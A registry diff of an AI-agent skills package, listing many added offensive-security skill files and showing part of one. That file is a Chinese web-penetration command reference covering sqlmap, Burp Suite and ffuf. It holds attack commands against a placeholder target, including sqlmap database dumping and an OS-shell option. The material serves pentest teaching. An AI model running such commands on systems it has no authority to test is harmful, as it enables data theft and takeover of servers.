opencode-skills-collection 4.0.43 → 4.0.45
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/bundled-skills/.antigravity-install-manifest.json +47 -1
- package/bundled-skills/api-rate-limit-handler/SKILL.md +282 -0
- package/bundled-skills/api-security/SKILL.md +205 -0
- package/bundled-skills/api-security/references/jwt-oauth-testing.md +123 -0
- package/bundled-skills/api-security/references/rest-graphql-testing.md +137 -0
- package/bundled-skills/apk-reverse/SKILL.md +438 -0
- package/bundled-skills/apk-reverse/references/android-advanced.md +365 -0
- package/bundled-skills/apk-reverse/references/apk-security-checklist.md +230 -0
- package/bundled-skills/apk-reverse/references/frida-bypass-kit.md +70 -0
- package/bundled-skills/apk-reverse/references/frida-cookbook.md +472 -0
- package/bundled-skills/attack-chain/SKILL.md +185 -0
- package/bundled-skills/attack-chain/references/attack-playbooks.md +126 -0
- package/bundled-skills/attack-chain/references/evasion-cheatsheet.md +133 -0
- package/bundled-skills/attack-chain/references/lifecycle-checklist.md +37 -0
- package/bundled-skills/attack-chain/references/phases.md +490 -0
- package/bundled-skills/binary-diff/SKILL.md +320 -0
- package/bundled-skills/binary-diff/references/prompt-template.md +173 -0
- package/bundled-skills/browser-extension-reverse/SKILL.md +99 -0
- package/bundled-skills/browser-extension-reverse/references/extension-analysis.md +10 -0
- package/bundled-skills/case-review/SKILL.md +167 -0
- package/bundled-skills/cloud-k8s/SKILL.md +124 -0
- package/bundled-skills/cloud-k8s/references/k8s-cloud-checklist.md +16 -0
- package/bundled-skills/code-audit/SKILL.md +92 -0
- package/bundled-skills/code-audit/references/sast-review-checklist.md +10 -0
- package/bundled-skills/database-security/SKILL.md +81 -0
- package/bundled-skills/database-security/references/db-misconfig-checklist.md +9 -0
- package/bundled-skills/diagram-generator/SKILL.md +199 -0
- package/bundled-skills/diagram-generator/references/README.md +3 -0
- package/bundled-skills/diagram-generator/references/diagram-patterns.md +254 -0
- package/bundled-skills/digital-forensics/SKILL.md +93 -0
- package/bundled-skills/digital-forensics/references/forensics-triage.md +10 -0
- package/bundled-skills/docs/integrations/jetski-cortex.md +3 -3
- package/bundled-skills/docs/integrations/jetski-gemini-loader/README.md +1 -1
- package/bundled-skills/docs/maintainers/repo-growth-seo.md +1 -1
- package/bundled-skills/docs/maintainers/skills-update-guide.md +1 -1
- package/bundled-skills/docs/sources/sources.md +9 -0
- package/bundled-skills/docs/users/aas-core.md +1 -1
- package/bundled-skills/docs/users/bundles.md +1 -1
- package/bundled-skills/docs/users/claude-code-skills.md +1 -1
- package/bundled-skills/docs/users/gemini-cli-skills.md +1 -1
- package/bundled-skills/docs/users/kiro-integration.md +1 -1
- package/bundled-skills/docs/users/usage.md +3 -3
- package/bundled-skills/docs/users/visual-guide.md +4 -4
- package/bundled-skills/docs-generator/SKILL.md +197 -0
- package/bundled-skills/docs-generator/references/security-report-templates.md +348 -0
- package/bundled-skills/docs-generator/references/templates.md +102 -0
- package/bundled-skills/docs-generator/references/vendor-report-rules.md +263 -0
- package/bundled-skills/dotnet-reverse/SKILL.md +197 -0
- package/bundled-skills/dotnet-reverse/references/common-workflow.md +171 -0
- package/bundled-skills/dotnet-reverse/references/obfuscators.md +145 -0
- package/bundled-skills/dotnet-reverse/references/sharp-tools.md +164 -0
- package/bundled-skills/edr-bypass-re/SKILL.md +248 -0
- package/bundled-skills/edr-bypass-re/references/hook-survey.md +226 -0
- package/bundled-skills/edr-bypass-re/references/telemetry-blinding.md +346 -0
- package/bundled-skills/edr-bypass-re/references/unhook-techniques.md +338 -0
- package/bundled-skills/email-security/SKILL.md +81 -0
- package/bundled-skills/email-security/references/email-auth-checklist.md +8 -0
- package/bundled-skills/firmware-pentest/SKILL.md +381 -0
- package/bundled-skills/firmware-pentest/references/emba-automated-analysis.md +192 -0
- package/bundled-skills/firmware-pentest/references/emulation-and-fuzz.md +337 -0
- package/bundled-skills/firmware-pentest/references/extraction-methodology.md +285 -0
- package/bundled-skills/ghidra-reverse/SKILL.md +98 -0
- package/bundled-skills/ghidra-reverse/references/ghidra-cheatsheet.md +12 -0
- package/bundled-skills/go-rust-reverse/SKILL.md +82 -0
- package/bundled-skills/go-rust-reverse/references/go-rust-notes.md +5 -0
- package/bundled-skills/hardware-security/SKILL.md +80 -0
- package/bundled-skills/hardware-security/references/debug-interface-triage.md +7 -0
- package/bundled-skills/ida-reverse/SKILL.md +401 -0
- package/bundled-skills/ida-reverse/references/LOCAL-SETUP.md +66 -0
- package/bundled-skills/ida-reverse/references/ida-mcp-cheatsheet.md +515 -0
- package/bundled-skills/identity-federation/SKILL.md +81 -0
- package/bundled-skills/identity-federation/references/sso-flow-checklist.md +9 -0
- package/bundled-skills/instructree/SKILL.md +94 -0
- package/bundled-skills/js-reverse/SKILL.md +239 -0
- package/bundled-skills/js-reverse/references/ast-deobfuscation.md +3 -0
- package/bundled-skills/js-reverse/references/automation-entry.md +12 -0
- package/bundled-skills/js-reverse/references/env-patching.md +6 -0
- package/bundled-skills/js-reverse/references/fallbacks.md +8 -0
- package/bundled-skills/js-reverse/references/instrumentation.md +9 -0
- package/bundled-skills/js-reverse/references/local-rebuild.md +11 -0
- package/bundled-skills/js-reverse/references/mcp-task-template.md +30 -0
- package/bundled-skills/js-reverse/references/node-env-rebuild.md +9 -0
- package/bundled-skills/js-reverse/references/output-contract.md +9 -0
- package/bundled-skills/js-reverse/references/task-artifacts.md +11 -0
- package/bundled-skills/js-reverse/references/task-input-template.md +11 -0
- package/bundled-skills/js-reverse/references/tool-defaults.md +7 -0
- package/bundled-skills/llm-security/SKILL.md +160 -0
- package/bundled-skills/llm-security/references/agent-obedience-engineering.md +243 -0
- package/bundled-skills/llm-security/references/agent-security-testing.md +116 -0
- package/bundled-skills/llm-security/references/owasp-llm-top10.md +48 -0
- package/bundled-skills/llm-security/references/prompt-injection-methodology.md +107 -0
- package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package-lock.json +4 -4
- package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package.json +1 -1
- package/bundled-skills/macos-reverse/SKILL.md +85 -0
- package/bundled-skills/macos-reverse/references/macho-triage.md +10 -0
- package/bundled-skills/malware-analysis/SKILL.md +311 -0
- package/bundled-skills/malware-analysis/references/anti-analysis-techniques.md +205 -0
- package/bundled-skills/malware-analysis/references/sandbox-orchestration.md +204 -0
- package/bundled-skills/malware-analysis/references/yara-sigma-rules.md +232 -0
- package/bundled-skills/mobile-reverse/SKILL.md +222 -0
- package/bundled-skills/mobile-reverse/references/anti-detection-bypass.md +182 -0
- package/bundled-skills/mobile-reverse/references/frida-objection-deep.md +218 -0
- package/bundled-skills/mobile-reverse/references/ios-reverse-guide.md +177 -0
- package/bundled-skills/muapi-media/SKILL.md +311 -0
- package/bundled-skills/ot-ics/SKILL.md +117 -0
- package/bundled-skills/ot-ics/references/ot-safe-assessment.md +10 -0
- package/bundled-skills/patch-diff-exploit/SKILL.md +278 -0
- package/bundled-skills/patch-diff-exploit/references/diff-tools-comparison.md +271 -0
- package/bundled-skills/patch-diff-exploit/references/patch-tuesday-workflow.md +253 -0
- package/bundled-skills/patch-diff-exploit/references/root-cause-and-poc.md +198 -0
- package/bundled-skills/pentest-tools/SKILL.md +346 -0
- package/bundled-skills/pentest-tools/references/ai-pentest-agents.md +148 -0
- package/bundled-skills/pentest-tools/references/ai-pentesting-landscape-2026.md +73 -0
- package/bundled-skills/pentest-tools/references/automation-loop-pattern.md +153 -0
- package/bundled-skills/pentest-tools/references/awesome-pentest-digest.md +175 -0
- package/bundled-skills/pentest-tools/references/burpsuite-mcp-guide.md +769 -0
- package/bundled-skills/pentest-tools/references/client-side-lab-playbook.md +155 -0
- package/bundled-skills/pentest-tools/references/kali-mcp-ecosystem.md +119 -0
- package/bundled-skills/pentest-tools/references/msf-protocol.md +169 -0
- package/bundled-skills/pentest-tools/references/network-attack-defense.md +350 -0
- package/bundled-skills/pentest-tools/references/nuclei-guide-2026.md +157 -0
- package/bundled-skills/pentest-tools/references/payloads.md +32 -0
- package/bundled-skills/pentest-tools/references/pentest-ai-agents-matrix.md +117 -0
- package/bundled-skills/pentest-tools/references/pentest-loop.md +270 -0
- package/bundled-skills/pentest-tools/references/recon-pipeline.md +154 -0
- package/bundled-skills/pentest-tools/references/templates/findings.md +21 -0
- package/bundled-skills/pentest-tools/references/templates/progress.md +17 -0
- package/bundled-skills/pentest-tools/references/templates/rules.md +35 -0
- package/bundled-skills/pentest-tools/references/templates/scope.md +29 -0
- package/bundled-skills/pentest-tools/references/templates/task_plan.md +27 -0
- package/bundled-skills/pentest-tools/references/web-attack-cheatsheet.md +387 -0
- package/bundled-skills/pentest-tools/src-hunter/SKILL.md +243 -0
- package/bundled-skills/pentest-tools/src-hunter/references/README.en.md +115 -0
- package/bundled-skills/pentest-tools/src-hunter/references/README.md +148 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/00-index.md +44 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/chinese-srcfingerprints.md +515 -0
- package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/default-credentials-cn.md +274 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/00-index.md +66 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/banking-finance.md +338 -0
- package/bundled-skills/pentest-tools/src-hunter/references/industry/telecom-isp.md +315 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/00-index.md +68 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/01-attack-priority.md +143 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/02-bypass-toolkit.md +357 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/03-evidence-discipline.md +205 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/04-control-gap-hunting.md +238 -0
- package/bundled-skills/pentest-tools/src-hunter/references/methodology/05-srctimebox-priority.md +161 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/adcs/346/224/273/345/207/273.md +254 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/exchange/346/224/273/345/207/273.md +254 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/sharepoint/346/224/273/345/207/273.md +113 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//344/277/241/346/201/257/346/224/266/351/233/206.md +947 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/205/215/346/235/200/344/270/216/350/247/204/351/201/277.md +780 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/207/255/350/257/201/347/252/203/345/217/226.md +1259 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/237/237/346/270/227/351/200/217/346/224/273/345/207/273.md +753 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/346/217/220/345/215/207.md +819 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/347/273/264/346/214/201.md +577 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/250/252/345/220/221/347/247/273/345/212/250.md +838 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//351/232/247/351/201/223/344/273/243/347/220/206.md +604 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ai/345/256/211/345/205/250.md +698 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/api/345/256/211/345/205/250.md +1935 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/csrf/350/267/250/347/253/231/350/257/267/346/261/202/344/274/252/351/200/240.md +952 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/jwt/345/256/211/345/205/250.md +496 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/lfi-rfi/346/226/207/344/273/266/345/214/205/345/220/253.md +1365 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/rce/350/277/234/347/250/213/344/273/243/347/240/201/346/211/247/350/241/214.md +1329 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/sql-nosql/346/263/250/345/205/245.md +1924 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssrf/346/234/215/345/212/241/347/253/257/350/257/267/346/261/202/344/274/252/351/200/240.md +1256 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssti/346/250/241/346/235/277/346/263/250/345/205/245.md +1151 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/websocket/345/256/211/345/205/250.md +487 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xss/350/267/250/347/253/231/350/204/232/346/234/254.md +1465 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xxe/345/256/236/344/275/223/346/263/250/345/205/245.md +815 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/270/232/345/212/241/351/200/273/350/276/221/346/274/217/346/264/236.md +594 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/272/221/345/256/211/345/205/250/346/274/217/346/264/236.md +561 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/276/233/345/272/224/351/223/276/346/224/273/345/207/273.md +399 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/216/237/345/236/213/351/223/276/346/261/241/346/237/223.md +401 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/274/200/346/224/276/351/207/215/345/256/232/345/220/221.md +396 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/226/207/344/273/266/346/274/217/346/264/236.md +0 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/241/206/346/236/266/346/274/217/346/264/236.md +2304 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/202/271/345/207/273/345/212/253/346/214/201.md +339 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/274/223/345/255/230/344/270/216cdn/345/256/211/345/205/250.md +497 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/256/244/350/257/201/346/274/217/346/264/236.md +1778 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/257/267/346/261/202/350/265/260/347/247/201.md +854 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/index.md +69 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/web/346/270/227/351/200/217.md +662 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/windows/346/270/227/351/200/217.md +100 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//344/277/241/346/201/257/346/224/266/351/233/206.md +852 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/206/205/347/275/221/346/270/227/351/200/217.md +873 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/207/255/350/257/201/347/252/203/345/217/226.md +186 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/237/237/346/270/227/351/200/217.md +50 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/257/206/347/240/201/346/224/273/345/207/273.md +462 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/235/203/351/231/220/346/217/220/345/215/207.md +168 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/274/217/346/264/236/345/210/251/347/224/250.md +445 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/263/273/347/273/237/345/221/275/344/273/244.md +410 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/272/242/351/230/237/345/267/245/345/205/267.md +64 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/274/226/347/240/201/350/247/243/347/240/201.md +226 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//351/232/247/351/201/223/344/273/243/347/220/206.md +84 -0
- package/bundled-skills/pentest-tools/src-hunter/references/payloader/waf-bypass.md +6504 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/00-index.md +57 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/api-rest.md +2050 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/arbitrary-x-authz.md +481 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/dos.md +615 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/file-upload.md +1365 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/graphql.md +253 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/http-smuggling.md +924 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/info-disclosure.md +432 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/intranet-postexp.md +4845 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/llm-prompt-injection.md +1394 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/logic-flaws.md +1796 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/mobile.md +397 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/oauth-saml-jwt.md +2504 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/path-traversal.md +1297 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/race-conditions.md +207 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/rce.md +4829 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/sqli.md +1620 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/ssrf-cache-host.md +2098 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/unauth-access.md +330 -0
- package/bundled-skills/pentest-tools/src-hunter/references/playbooks/xss.md +1159 -0
- package/bundled-skills/pentest-tools/src-hunter/references/templates/report-submission.md +346 -0
- package/bundled-skills/pentest-tools/src-hunter/references/tools/mcp-jshook.md +174 -0
- package/bundled-skills/protocol-reverse/SKILL.md +108 -0
- package/bundled-skills/protocol-reverse/references/protocol-workflow.md +29 -0
- package/bundled-skills/pwn-chain/SKILL.md +209 -0
- package/bundled-skills/pwn-chain/references/heap-pwn.md +283 -0
- package/bundled-skills/pwn-chain/references/kernel-pwn.md +370 -0
- package/bundled-skills/pwn-chain/references/stack-pwn.md +312 -0
- package/bundled-skills/radare2/SKILL.md +460 -0
- package/bundled-skills/radare2/references/cheatsheet.md +129 -0
- package/bundled-skills/radio-sdr/SKILL.md +77 -0
- package/bundled-skills/radio-sdr/references/sdr-lab-rules.md +6 -0
- package/bundled-skills/reverse-browser-automation/SKILL.md +249 -0
- package/bundled-skills/reverse-browser-automation/references/playwright-cheatsheet.md +425 -0
- package/bundled-skills/reverse-engineering/SKILL.md +213 -0
- package/bundled-skills/reverse-engineering/dsl-vm-reverse/SKILL.md +388 -0
- package/bundled-skills/reverse-engineering/references/ai-assisted-re.md +149 -0
- package/bundled-skills/reverse-engineering/references/anti-analysis.md +836 -0
- package/bundled-skills/reverse-engineering/references/awesome-re-resources.md +135 -0
- package/bundled-skills/reverse-engineering/references/crypto-decode-tools.md +220 -0
- package/bundled-skills/reverse-engineering/references/elf-analysis.md +296 -0
- package/bundled-skills/reverse-engineering/references/field-notes.md +540 -0
- package/bundled-skills/reverse-engineering/references/go-reverse.md +240 -0
- package/bundled-skills/reverse-engineering/references/kernel-driver-reverse.md +298 -0
- package/bundled-skills/reverse-engineering/references/languages-compiled.md +587 -0
- package/bundled-skills/reverse-engineering/references/languages-platforms.md +486 -0
- package/bundled-skills/reverse-engineering/references/languages.md +499 -0
- package/bundled-skills/reverse-engineering/references/nonpe-format-cookbook.md +301 -0
- package/bundled-skills/reverse-engineering/references/ollvm-deobfuscation.md +501 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf-2.md +397 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf-3.md +719 -0
- package/bundled-skills/reverse-engineering/references/patterns-ctf.md +532 -0
- package/bundled-skills/reverse-engineering/references/patterns.md +801 -0
- package/bundled-skills/reverse-engineering/references/platforms-hardware.md +304 -0
- package/bundled-skills/reverse-engineering/references/platforms.md +442 -0
- package/bundled-skills/reverse-engineering/references/re-agent-workflow.md +240 -0
- package/bundled-skills/reverse-engineering/references/tools-advanced.md +822 -0
- package/bundled-skills/reverse-engineering/references/tools-dynamic.md +846 -0
- package/bundled-skills/reverse-engineering/references/tools.md +546 -0
- package/bundled-skills/supply-chain-security/SKILL.md +180 -0
- package/bundled-skills/supply-chain-security/references/cicd-pipeline-security.md +137 -0
- package/bundled-skills/supply-chain-security/references/sbom-sca-methodology.md +74 -0
- package/bundled-skills/thick-client/SKILL.md +104 -0
- package/bundled-skills/thick-client/references/thick-client-checklist.md +9 -0
- package/bundled-skills/threat-hunting/SKILL.md +94 -0
- package/bundled-skills/threat-hunting/references/hunting-loop.md +5 -0
- package/bundled-skills/threat-intelligence/SKILL.md +176 -0
- package/bundled-skills/threat-intelligence/references/x-public-intelligence.md +93 -0
- package/bundled-skills/tree-ring-memory/SKILL.md +29 -9
- package/bundled-skills/wifi-wireless/SKILL.md +80 -0
- package/bundled-skills/wifi-wireless/references/wireless-lab-rules.md +6 -0
- package/bundled-skills/windows-ad/SKILL.md +109 -0
- package/bundled-skills/windows-ad/references/ad-attack-paths.md +12 -0
- package/package.json +1 -1
- package/skills_index.json +1214 -2
|
@@ -0,0 +1,662 @@
|
|
|
1
|
+
# Web渗透
|
|
2
|
+
|
|
3
|
+
_16 条工具命令_
|
|
4
|
+
|
|
5
|
+
### SQLMap `sqlmap`
|
|
6
|
+
_自动化SQL注入工具_
|
|
7
|
+
|
|
8
|
+
**Step 0**
|
|
9
|
+
> 对URL进行SQL注入测试
|
|
10
|
+
```
|
|
11
|
+
sqlmap -u "http://target.com/page?id=1"
|
|
12
|
+
```
|
|
13
|
+
**语法解析:**
|
|
14
|
+
- `sqlmap` — SQLMap工具 _command_
|
|
15
|
+
- `-u` — 指定目标URL _parameter_
|
|
16
|
+
|
|
17
|
+
**Step 0**
|
|
18
|
+
> 只测试指定的参数
|
|
19
|
+
```
|
|
20
|
+
sqlmap -u "http://target.com/page?id=1&name=test" -p id
|
|
21
|
+
```
|
|
22
|
+
**语法解析:**
|
|
23
|
+
- `-p` — 指定要测试的参数 _parameter_
|
|
24
|
+
|
|
25
|
+
**Step 0**
|
|
26
|
+
> 测试POST请求
|
|
27
|
+
```
|
|
28
|
+
sqlmap -u "http://target.com/login" --data="user=admin&pass=123"
|
|
29
|
+
```
|
|
30
|
+
**语法解析:**
|
|
31
|
+
- `--data=` — POST数据 _parameter_
|
|
32
|
+
|
|
33
|
+
**Step 0**
|
|
34
|
+
> 使用Cookie进行认证
|
|
35
|
+
```
|
|
36
|
+
sqlmap -u "http://target.com/page?id=1" --cookie="PHPSESSID=xxx"
|
|
37
|
+
```
|
|
38
|
+
**语法解析:**
|
|
39
|
+
- `--cookie=` — 设置Cookie _parameter_
|
|
40
|
+
|
|
41
|
+
**Step 0**
|
|
42
|
+
> 指定后端数据库类型
|
|
43
|
+
```
|
|
44
|
+
sqlmap -u "http://target.com/page?id=1" --dbms=mysql
|
|
45
|
+
```
|
|
46
|
+
**语法解析:**
|
|
47
|
+
- `--dbms=` — 数据库类型(mysql,mssql,oracle等) _parameter_
|
|
48
|
+
|
|
49
|
+
**Step 0**
|
|
50
|
+
> 获取所有数据库名
|
|
51
|
+
```
|
|
52
|
+
sqlmap -u "http://target.com/page?id=1" --dbs
|
|
53
|
+
```
|
|
54
|
+
**语法解析:**
|
|
55
|
+
- `--dbs` — 枚举数据库 _parameter_
|
|
56
|
+
|
|
57
|
+
**Step 0**
|
|
58
|
+
> 获取指定数据库的表
|
|
59
|
+
```
|
|
60
|
+
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
|
|
61
|
+
```
|
|
62
|
+
**语法解析:**
|
|
63
|
+
- `-D` — 指定数据库 _parameter_
|
|
64
|
+
- `--tables` — 枚举表 _parameter_
|
|
65
|
+
|
|
66
|
+
**Step 0**
|
|
67
|
+
> 获取指定表的列
|
|
68
|
+
```
|
|
69
|
+
sqlmap -u "http://target.com/page?id=1" -D db -T table --columns
|
|
70
|
+
```
|
|
71
|
+
**语法解析:**
|
|
72
|
+
- `-T` — 指定表 _parameter_
|
|
73
|
+
- `--columns` — 枚举列 _parameter_
|
|
74
|
+
|
|
75
|
+
**Step 0**
|
|
76
|
+
> 提取指定列的数据
|
|
77
|
+
```
|
|
78
|
+
sqlmap -u "http://target.com/page?id=1" -D db -T table -C col1,col2 --dump
|
|
79
|
+
```
|
|
80
|
+
**语法解析:**
|
|
81
|
+
- `-C` — 指定列 _parameter_
|
|
82
|
+
- `--dump` — 提取数据 _parameter_
|
|
83
|
+
|
|
84
|
+
**Step 0**
|
|
85
|
+
> 尝试获取操作系统Shell
|
|
86
|
+
```
|
|
87
|
+
sqlmap -u "http://target.com/page?id=1" --os-shell
|
|
88
|
+
```
|
|
89
|
+
**语法解析:**
|
|
90
|
+
- `--os-shell` — 获取OS交互式Shell _parameter_
|
|
91
|
+
|
|
92
|
+
**Step 0**
|
|
93
|
+
> 通过代理发送请求
|
|
94
|
+
```
|
|
95
|
+
sqlmap -u "http://target.com/page?id=1" --proxy="http://127.0.0.1:8080"
|
|
96
|
+
```
|
|
97
|
+
**语法解析:**
|
|
98
|
+
- `--proxy=` — 设置代理服务器 _parameter_
|
|
99
|
+
|
|
100
|
+
**Step 0**
|
|
101
|
+
> 指定注入技术类型
|
|
102
|
+
```
|
|
103
|
+
sqlmap -u "http://target.com/page?id=1" --technique=BEUST
|
|
104
|
+
```
|
|
105
|
+
**语法解析:**
|
|
106
|
+
- `--technique=` — B=布尔盲注,E=报错注入,U=联合查询,S=堆叠,T=时间盲注 _parameter_
|
|
107
|
+
|
|
108
|
+
**Step 0**
|
|
109
|
+
> 设置扫描级别和风险等级
|
|
110
|
+
```
|
|
111
|
+
sqlmap -u "http://target.com/page?id=1" --level=5 --risk=3
|
|
112
|
+
```
|
|
113
|
+
**语法解析:**
|
|
114
|
+
- `--level=` — 扫描级别(1-5),越高越全面 _parameter_
|
|
115
|
+
- `--risk=` — 风险等级(1-3),越高越危险 _parameter_
|
|
116
|
+
|
|
117
|
+
---
|
|
118
|
+
|
|
119
|
+
### Burp Suite `burpsuite`
|
|
120
|
+
_Web安全测试平台_
|
|
121
|
+
|
|
122
|
+
**Step 0**
|
|
123
|
+
> 配置代理监听
|
|
124
|
+
```
|
|
125
|
+
Proxy -> Options -> Proxy Listeners -> Add -> Port 8080
|
|
126
|
+
```
|
|
127
|
+
|
|
128
|
+
**Step 0**
|
|
129
|
+
> 开启请求拦截
|
|
130
|
+
```
|
|
131
|
+
Proxy -> Intercept -> Intercept is on
|
|
132
|
+
```
|
|
133
|
+
|
|
134
|
+
**Step 0**
|
|
135
|
+
> 发送请求到Repeater
|
|
136
|
+
```
|
|
137
|
+
右键 -> Send to Repeater (Ctrl+R)
|
|
138
|
+
```
|
|
139
|
+
|
|
140
|
+
**Step 0**
|
|
141
|
+
> 发送请求到Intruder
|
|
142
|
+
```
|
|
143
|
+
右键 -> Send to Intruder (Ctrl+I)
|
|
144
|
+
```
|
|
145
|
+
|
|
146
|
+
**Step 0**
|
|
147
|
+
> 四种攻击类型说明
|
|
148
|
+
```
|
|
149
|
+
Sniper: 单个payload
|
|
150
|
+
Battering ram: 同一payload
|
|
151
|
+
Pitchfork: 多个payload并行
|
|
152
|
+
Cluster bomb: 多个payload组合
|
|
153
|
+
```
|
|
154
|
+
|
|
155
|
+
**Step 0**
|
|
156
|
+
> 启动主动扫描
|
|
157
|
+
```
|
|
158
|
+
Dashboard -> New Scan -> 选择目标URL
|
|
159
|
+
```
|
|
160
|
+
|
|
161
|
+
**Step 0**
|
|
162
|
+
> 安装BApp插件
|
|
163
|
+
```
|
|
164
|
+
Extender -> BApp Store -> 选择插件 -> Install
|
|
165
|
+
```
|
|
166
|
+
|
|
167
|
+
**Step 0**
|
|
168
|
+
> 复制请求内容
|
|
169
|
+
```
|
|
170
|
+
右键 -> Copy to clipboard -> Request
|
|
171
|
+
```
|
|
172
|
+
|
|
173
|
+
---
|
|
174
|
+
|
|
175
|
+
### FFUF `ffuf`
|
|
176
|
+
_快速Web模糊测试工具_
|
|
177
|
+
|
|
178
|
+
**Step 0**
|
|
179
|
+
> 基础目录爆破
|
|
180
|
+
_platform: linux_
|
|
181
|
+
```
|
|
182
|
+
ffuf -u http://target.com/FUZZ -w wordlist.txt
|
|
183
|
+
```
|
|
184
|
+
|
|
185
|
+
**Step 0**
|
|
186
|
+
> 添加文件扩展名
|
|
187
|
+
_platform: linux_
|
|
188
|
+
```
|
|
189
|
+
ffuf -u http://target.com/FUZZ -w wordlist.txt -e .php,.html,.txt
|
|
190
|
+
```
|
|
191
|
+
|
|
192
|
+
**Step 0**
|
|
193
|
+
> GET参数测试
|
|
194
|
+
_platform: linux_
|
|
195
|
+
```
|
|
196
|
+
ffuf -u http://target.com/?param=FUZZ -w wordlist.txt
|
|
197
|
+
```
|
|
198
|
+
|
|
199
|
+
**Step 0**
|
|
200
|
+
> POST数据测试
|
|
201
|
+
_platform: linux_
|
|
202
|
+
```
|
|
203
|
+
ffuf -u http://target.com -X POST -d "user=FUZZ&pass=test" -w wordlist.txt
|
|
204
|
+
```
|
|
205
|
+
|
|
206
|
+
**Step 0**
|
|
207
|
+
> Host头测试
|
